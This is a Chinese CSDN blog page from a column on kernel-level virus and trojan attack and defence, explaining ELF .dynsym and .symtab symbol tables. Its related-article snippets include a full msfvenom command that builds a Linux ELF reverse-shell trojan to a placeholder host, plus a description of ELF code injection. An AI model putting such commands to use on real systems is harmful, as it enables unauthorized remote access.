内核级病毒与木马攻防:ELF文件的符号表和函数调用追踪

最新推荐文章于 2023-05-15 17:25:01 发布
最新推荐文章于 2023-05-15 17:25:01 发布
阅读量552 收藏
点赞数
分类专栏: 内核级病毒与木马攻防战 文章标签: 符号表 函数调用追踪 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tyler_download/article/details/107631143
版权

熟悉编译原理的同学一定了解何为符号,所谓符号其实是一种数据结构,用来描述编程语言中定义的特定对象。例如编程语言中定义的变量,函数都有特定的符号用于描述他们的性质。例如变量对应的符号中包含了变量对应的字符串名称,变量的类型,以及变量对应的内存。函数对应的符号包含了函数名称字符串,函数的返回值类型,函数入口内存地址等,在代码调试时,你把鼠标挪动到变量所在位置,IDE就给你显示出变量当前的取值等信息,这些信息就来自变量对应的符号,我在有关编译原理的两门课程里对符号有非常深入的讲解。

在elf文件中存在两种符号表,分别为.dynsym和.symtab。.dynsym包含了外部链接进来的全局变量对应符号,例如当代码中使用printf函数时,该函数对应的符号就存储在.dynsym中。而.symtab包含了.dynsym中的所有符号,还包括了代码本地定义的变量和函数符号,既然后者已经包含前者的符号表,为何ELF文件格式依然要保持两张符号表呢,我们先用readelf -S来再次查看可执行文件的符号表段:readelf -S ./hello_world,在输出的结果中可以看到,有些段对应的flag是标志A,有些是WA,如下图:

在这里插入图片描述

其中A表示ALLOC,WA表示WRITE/ALLOC,AX表示ALLOC/EXEC,

了解本专栏 订阅专栏 解锁全文
tyler_download
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
callgraph-gen:从 elf 二进制文件生成调用
05-29
调用图生成器 从 elf 二进制文件生成调用图 二进制发布 Windows 应用程序/ macOS Catalina 应用程序 入门 它需要以下库来构建代码。 uthash:哈希库 PCRE:Perl 兼容的正则表达式 libxml2: : 安装 PCRE 库和 libxml2 目录。 或者在 Ubuntu 上安装 libpcre2-dev 和 libxml2-dev 包。 $ sudo apt install libpcre2-dev libxml2-dev 签出存储库并初始化所有子模块 $ git clone https://github.com/kuopinghsu/callgraph-gen.git $ cd callgraph-gen $ git submodule update --init --recursive 建造 $ make 基于 Visual S
elf_inject:操作系统大作业:ELF文件注入
03-11
精灵文件注入 操作系统大作业 ⁠描述: 在Linux中修改一个现有的elf插入程序(替代没有源代码!例如如vi或其他如何自己编写的替换程序)。让该程序运行后先执行一个特别的附件功能(附加功能是:创建或注意:附加功能嵌入到原来的程序中,不是一个独立的程序!要求了解elf文件格式,另外建议使用汇编编程。 操作流程 测试用例介绍: 本elf注入的功能是在elf文件执行前,生成helloworld文件并写入内容:helloworld,之后再执行原elf文件功能 gcc main.c -o main # 生成注入函数 # 测试文件功能:打印 This is the program, whick will be injected.\n gcc test.c -o test # 生成测试elf文件 ./main test # elf注入 ./test # 执行注入后的elf文件 main.c中
vmlinux-to-elf:通过提取内核符号表(kallsyms)从原始内核中恢复可完全分析的.ELF的工具
03-21
vmlinux-to-elf 该工具允许从vmlinux / vmlinuz / bzImage / zImage内核映像(原始二进制Blob或已存在但已剥离的.ELF文件)中获取具有可恢复功能和可变符号的完全可分析的.ELF文件。 为此,它将在内核中扫描内核符号表( ),这是几乎每个内核中都存在的压缩符号表,大多数情况下未。 因为相关的符号表最初是压缩的,所以它应该恢复原始二进制文件中不可见的字符串。 它会生成一个.ELF文件,您可以使用IDA Pro和Ghidra对其进行分析。因此,该工具对于嵌入式系统的逆向工程很有用。 用法: ./vmlinux-to-elf < input_kernel.bin > < output> 全系统安装: sudo apt install python3-pip sudo pip3 install --upgrade lz4
ELF符号表修改
11-05
ELF符号表修改
telfhash:ELF文件的符号哈希
05-25
趋势科技ELF哈希(telfhash) telfhash是ELF文件的符号哈希,就像imphash是PE文件的导入哈希一样。 安装 要求 telfhash在生成哈希时使用TLSH。 必须在您的系统中安装TLSH才能使telfhash正常工作。 您可以从此处安装TLSH: TLSH git repo包含有关如何编译和安装TLSH二进制文件和库的详细说明。 别忘了还要安装TLSH Python库。 telfhash使用TLSH Python库生成实际的哈希。 正在安装 从此处克隆telfhash存储库: 使用setup.py安装telfhash库: python setup.py install 用法 如果未安装TLSH Python库,则telfhash将生成异常错误。 命令行 如果通过python setup.py install命令python setup.py instal
ELF格式解读-符号表
不会写代码的丝丽
04-30 3451
前言 一个优先的symtab文章 我们常常调试错误说需要符号表,那么符号表是什么?符号表仅仅用来调试? 符号表本质就是一个映射表,举个例子:某行二进制汇编代码映射到源码第几行。 符号表的作用: 调试 重定位 调试 window工程有一个*.pdb文件,里面编包含调试符号.可参阅wiki window pdb格式。 在java工程会使用一个叫混淆的技术,混淆后会生成混淆前后的映射文件mapping.txt,这个也可以理解为符号表的一种。 在linux有一个dwarf的文件格式也是专门用于调试的文件。参阅w
OpenSBI ELF rela.dyn和.dynsym动态链接过程
Do one thing at a time, and do well.
03-21 2461
在OpenSBI中重定位分成了两种,根据是否配置了FW_PIC宏来区分, 配置了FW_PIC,即本文描述的rela.dyn和.dynsym的动态链接。 未配置FW_PIC是加载地址和链接地址不相等情况下的代码拷贝重定位。 rela.dyn .rela.dyn节是什么节呢?该节保存的是重定位信息,数据内容是包含带有显式加数的重定位条目,每个条目固定大小(24个字节)。话又说回来,什么是重定位? 这里引用oracle网站的解答:重定位是连接符号引用与符号定义的过程。例如,程序调用函数时,关联的调用
ELF 格式详解
kunkliu的博客
03-19 3581
可重定位的目标文件(Relocatable)也就是通常称的目标文件,后缀为.o可执行文件(Executable)共享库(Shared Object)共享文件:也就是通常称的库文件,后缀为.so注1: Linux中的readelf命令可以查看ELF文件的详细信息注2:ELF文件只能在操作系统环境下运行,裸机环境运行的是BIN文件;编译器默认输出的文件格式是ELF格式,可以使用objcopy命令转化为BIN文件:将name.elf转化为name.bin文件armbinary。
ELF 解析符号包,包含symtab 和dynsym
ylcangel的专栏
07-20 7956
ELF 解析符号包,包含symtab 和dynsym,并未对所以平台支持 /* * ParseDynSymTable.c * * Created on: 2014年7月19日 * Author: angel-toms */ #include "ElfParser.h" Elf32_Sym* get_elf_section_of_sym_table(MemMapping*
elf_hook_with_c_ELFfileformat_elf_slabsli9_
09-29
debug elf file programmaticlly
ELF64文件逆向分析知识—[1]64位逆向基础知识
杏林小轩
12-04 7307
第一次用IDA打开ELF64可执行文件进行分析,有种刚学逆向的错觉,各种之前不认识的寄存器,函数调用完全找不到函数参数是怎么传递的。看来有必要恶补一下x64位CPU的和逆向分析相关的知识。
ELF文件格式、编译过程和符号表
qq_43214726的博客
05-15 1900
ELF的英文全称是The Executable and Linking Format,最初是由UNIX系统实验室开发、发布的ABI(Application Binary Interface)接口的一部分,也是Linux的主要可执行文件格式。比如说用户空间的.out就是一个ELF文件一个程序的3个基本段:text段,data段,bss段。text段:就是的,编译时确定,只读;data段:存放在编译阶段(而非运行时)就能确定的数据,可读可写。也就是通常所说的静态存储区,赋了和存放在这个区域,
ELF文件的加载过程(load_elf_binary函数详解)--Linux进程的管理与调度(十三)
热门推荐
OSKernelLAB(gatieme)
06-10 3万+
日期 内核版本 架构 作者 GitHub CSDN 2016-06-04 Linux-4.6 X86 & arm gatieme LinuxDeviceDrivers Linux进程管理与调度-之-进程的描述 加载和动态链接从编译/链接和运行的角度看,应用程序和库程序的连接有两种方式。 一种是固定的、静态的连接,就是把需要用到的库函数的目标代码(二进制)代
ELF中模块间数据引用的重定位
faxiang1230的专栏
06-08 366
在模块中进行各类数据引用的方式总共分有:模块内数据、函数访问,模块间数据、函数访问,其中模块内的访问在链接时就已经决定了他们的相对偏移,在运行时不再关心这部分的内容,而模块间访问相对就比较复杂了。 为了复用物理内存,发明了PIC/PIE技术,将数据和指令分开GOT和PLT stub,这样重定位代码只需要修改GOT的数据部分就可以访问正确的函数了,ELF的PLT和GOT分析了模块间函数访问过程中的lazy bind机制。 http://www.qnx.com/developers/docs/qnxcar2/i
ELF符号表分析
astrotycoon
12-20 8364
Symbol Table An object file's symbol table holds information needed to locate and relocate a program's symbolic definitions and references. A symbol table index is a subscript into this array. Index ...
ELF函数重定位问题
ayu_ag的专栏
11-28 5026
一、背景 gcc将代码编译为.o,ld将.o连接为.so或者可执行程序,可执行程序在使用PIC方式的.so时,都会遇到函数重定位的问题,本文对该问题进行分析。 二、静态连接 代码示例: x.c: #include void foo() { printf("foo\n"); }main.c: extern void foo(void); int main(void) {
elf中读取函数地址
翻滚吧骚年
04-09 3104
废话不说,立马动手。先准备一份测试代码: #include void funcUp(void) { printf("Hello world 1!\n"); return; } int main(int argc, char* argv[]) { funcUp(); funcDown(); return 0; } int funcDown(void)
msf生成linux elf木马反弹shell
weixin_45632448的博客
04-08 1万+
最开始用的生成木马的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf 生成木马只有250b,显然是不成功的 问题根源: msf版本不同导致语法不同 msf5版本的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf >
Linux elf里面的符号表和程序运行时候的函数符号表关系
最新发布
07-12
在 Linux ELF(可执行与可链接格式)中,有两个相关的符号表:静态符号表和动态符号表。它们与程序运行时的函数符号表有以下关系: 1. 静态符号表:静态符号表是在编译时由编译器创建的一张符号表,它包含了可执行文件中的所有符号信息,包括函数、全局变量、局部变量等。静态符号表记录了符号的名称、类型、地址等信息。它在链接过程中用于解析符号的引用关系,以确定符号的最终地址。 2. 动态符号表:动态符号表是在运行时由动态链接器(如 ld.so)创建的一张符号表,它包含了可执行文件中需要在运行时解析的动态符号信息,如共享库中的函数和变量。动态符号表记录了符号的名称、类型、地址等信息。它用于在程序运行时进行动态链接,将程序与共享库中的符号关联起来。 3. 函数符号表函数符号表是在程序运行时动态生成的,用于记录程序当前可见的函数符号及其地址。这个表主要由动态链接器和调试器使用,用于调试目的或者在运行时查找函数地址。 静态符号表和动态符号表都记录了程序中的符号信息,但它们的使用方式和目的略有不同。静态符号表用于链接过程,解析符号引用关系以确定符号的地址。动态符号表用于动态链接过程,在程序运行时将符号与共享库中的实际地址关联起来。函数符号表则是在程序运行时动态生成的,用于调试和查找函数地址。 需要注意的是,函数符号表是一个在运行时动态生成和维护的结构,它的具体实现可能会因操作系统、编译器、调试器等因素而有所不同。以上是一般情况下的概述,具体实现细节可能会有所差异。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值